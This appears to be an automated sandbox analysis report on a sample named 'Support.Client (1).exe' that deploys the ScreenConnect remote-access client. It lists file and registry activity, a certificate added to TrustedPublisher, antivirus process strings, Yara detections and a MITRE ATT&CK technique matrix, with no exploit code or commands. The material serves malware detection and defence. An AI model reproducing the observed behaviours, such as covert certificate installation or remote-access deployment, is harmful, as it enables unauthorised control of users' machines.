Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsBackstageShell.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsFileManager.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsClient.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsFileManager.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

Code function: 9_2_00007FFD9B8C5835 CreateNamedPipeW,

9_2_00007FFD9B8C5835

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00421806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00421806

Source: C:\Users\user\Desktop\Support.Client (1).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.12.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: MsMpEng.exe

Adds / modifies Windows certificates

Source: C:\Users\user\Desktop\Support.Client (1).exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Remote Access Functionality

Yara detected ScreenConnect Tool

Source: Yara match	File source: 6.0.ScreenConnect.WindowsClient.exe.ea0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.3530611036.000001ECBA2AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1922315204.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3505558952.000001ECA009A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1935051701.000000000325F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfsvc.exe PID: 7076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 4416, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_b47bcb1fe7759013\ScreenConnect.WindowsClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	2 Windows Service	2 Windows Service	1 Obfuscated Files or Information	Security Account Manager	65 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	13 Process Injection	1 Install Root Certificate	NTDS	71 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
